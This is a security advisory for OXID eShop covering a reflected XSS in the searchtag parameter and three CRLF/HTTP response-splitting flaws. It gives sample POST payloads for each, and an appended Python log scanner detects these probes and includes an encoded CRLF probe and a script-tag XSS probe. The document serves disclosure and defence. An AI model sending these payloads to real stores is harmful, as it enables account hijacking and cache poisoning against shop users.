OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities

Related Vulnerabilities: CVE-2014-2017   CVE-2014-2016  
Publish Date: 20 Mar 2014
Author: //sToRm
# Exploit Title: OXID eShop v<4.7.11/5.0.11 + v<4.8.4/5.1.4 Multiple Vulnerabilities 
# Google Dork: -
# Date: 12/2013
# Exploit Author: //sToRm 
# Author mail: storm@sicherheit-online.org
# Vendor Homepage: http://www.oxid-esales.com
# Software Link: -
# Version: All versions < 4.7.11/5.0.11 + All versions < 4.8.4/5.1.4
# Tested on: Multiple platforms
# CVE : CVE-2014-2016 + CVE-2014-2017 (reserved)


###########################################################################################################
# XSS vulnerability #######################################################################################

Under certain circumstances, an attacker can trick a user into entering a specially crafted 
URI or clicking on a malformed link to exploit a cross-site scripting vulnerability that 
theoretically can be used to gain unauthorized access to the user's account or to collect 
sensitive information about this user. 

SAMPLE: -------------------------------------------------------------------------------
http://HOST/tag/sample/sample-name.html?cur=2&listtype=tag&pgNr=2&searchtag=[XSS]
---------------------------------------------------------------------------------------

Products:

    OXID eShop Enterprise Edition
    OXID eShop Professional Edition
    OXID eShop Community Edition 

Releases: All previous releases 
Platforms: All releases are affected on all platforms. 

STATE
- Resolved in OXID eShop version 4.7.11/5.0.11 and OXID eShop version 4.8.4/5.1.4.
- A fix for OXID eShop version 4.6.8 is available.

Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-001

###########################################################################################################
###########################################################################################################





########################################################################################################### 
# Multiple CRLF injection / HTTP response splitting #######################################################

Under certain circumstances (depending on the browser, OS and PHP version), an attacker can trick a user into 
entering a specially crafted URI or clicking on a malformed link to exploit an HTTP response splitting vulnerability
that theoretically can be used to poison caches, gain unauthorized access to the user's account or collect 
sensitive information about this user.

Passing such a malformed URI could:
- return a blank page or a PHP error (depending on the server configuration)
- set unsolicited browser cookies 

Products:

    OXID eShop Enterprise Edition
    OXID eShop Professional Edition
    OXID eShop Community Edition 

Releases: All previous releases 
Platforms: All releases are affected on all platforms. 

STATE:
- Resolved in OXID eShop version 4.7.11/5.0.11 and OXID eShop version 4.8.4/5.1.4.
- A fix for OXID eShop version 4.6.8 is available. 

Bulletin: http://wiki.oxidforge.org/Security_bulletins/2014-002


Vulnerability details:

########################################################################################################### 
# 1 # CRLF injection / HTTP response splitting ############################################################

PATH: ROOT/index.php
PARAMETER: anid

CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=start
&aid=1
&am=1
&anid=%0d%0a%20[INJECT:INJECT]
&cl=start
&fnc=tobasket
&lang=0
&pgNr=0
&stoken=1
-----------------------------------------------------------------------------------------------------------

SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=start&aid=1&am=1&anid=%0d%0a%20INJECTED:INJECTED_DATA&cl=start&fnc=tobasket&lang=0&pgNr=0&stoken=1
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################





###########################################################################################################
# 2 # CRLF injection / HTTP response splitting ############################################################

PATH: ROOT/index.php
PARAMETER: cnid

CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=details
&aid=1
&am=1
&anid=0
&cl=details
&cnid=%0d%0a%20[INJECTED:INJECTED]
&fnc=tobasket
&lang=0
&listtype=list
&panid=
&parentid=1
&stoken=1
&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------

SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=%0d%0a%20INJECTED:INJECTED_DATA&fnc=tobasket&lang=0&listtype=list&panid=&parentid=1&stoken=1&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################





###########################################################################################################
# 3 # CRLF injection / HTTP response splitting ############################################################

PATH: ROOT/index.php
PARAMETER: listtype

CONCEPT: --------------------------------------------------------------------------------------------------
actcontrol=details
&aid=1
&am=1
&anid=0
&cl=details
&cnid=0
&fnc=tobasket
&lang=0
&listtype=%0d%0a%20[INJECTED:INJECTED]
&panid=
&parentid=0
&stoken=0
&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------

SAMPLE:
--- POST /index.php HTTP/1.1 ------------------------------------------------------------------------------
actcontrol=details&aid=1&am=1&anid=0&cl=details&cnid=0&fnc=tobasket&lang=0&listtype=%0d%0a%20INJECTED:INJECTED_DATA&panid=&parentid=0&stoken=0&varselid%5b0%5d=
-----------------------------------------------------------------------------------------------------------
###########################################################################################################
###########################################################################################################
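Added example, not part of the original advisory and not OXID's own code: a defender-side log check that URL-decodes request parameters and flags CR/LF sequences in the anid, cnid and listtype parameters (the three CRLF cases above) and script-like content in searchtag (the XSS case). The log lines, the client addresses and the X-Injected header name are constructed for the example.

```python
"""Added example: flag probes for the OXID parameters named in this advisory."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameters the advisory lists for CRLF injection (index.php) and reflected XSS (tag pages)
CRLF_PARAMS = {"anid", "cnid", "listtype"}
XSS_PARAMS = {"searchtag"}

CRLF_RE = re.compile(r"[\r\n]")
XSS_RE = re.compile(r"<\s*/?\s*[a-z]|javascript:", re.IGNORECASE)
# Combined log format: client ident user [time] "METHOD TARGET PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Mar/2014:10:00:01 +0100] "GET /index.php?cl=start&fnc=tobasket&anid=%0d%0a%20X-Injected:%201 HTTP/1.1" 200 512
203.0.113.7 - - [20/Mar/2014:10:00:02 +0100] "GET /tag/sample/sample-name.html?cur=2&listtype=tag&pgNr=2&searchtag=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048
198.51.100.3 - - [20/Mar/2014:10:00:03 +0100] "GET /index.php?cl=details&anid=0&cnid=root&listtype=list HTTP/1.1" 200 4096
"""


def analyze_request(method, target, body=""):
    """Return [(param, kind), ...] for one request; kind is 'crlf' or 'xss'."""
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if method == "POST" and body:  # the advisory's samples send the parameters in a POST body
        params += parse_qsl(body, keep_blank_values=True)
    findings = []
    for name, value in params:
        value = unquote(value)  # second decode catches %250d%250a-style double encoding
        if name in CRLF_PARAMS and CRLF_RE.search(value):
            findings.append((name, "crlf"))
        if name in XSS_PARAMS and XSS_RE.search(value):
            findings.append((name, "xss"))
    return findings


def scan_log(text):
    """Scan combined-format lines; returns [(client, path, findings), ...] for hits only."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than abort the scan
        client, _ts, method, target, _status = m.groups()
        findings = analyze_request(method, target)  # POST bodies are not in access logs
        if findings:
            hits.append((client, urlsplit(target).path, findings))
    return hits


if __name__ == "__main__":
    for client, path, findings in scan_log(SAMPLE_LOG):
        print(f"{client} {path} {findings}")
```

Because access logs carry no POST body, the POST variants in the samples above are only visible where the WAF or application logs the body; analyze_request accepts that body as its third argument.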



Many greetings to all lunatics and freaks out there who live daily in the code like me and my partners. 
Thanks to the developers, who responded relatively quickly.

Cheers!
//sToRm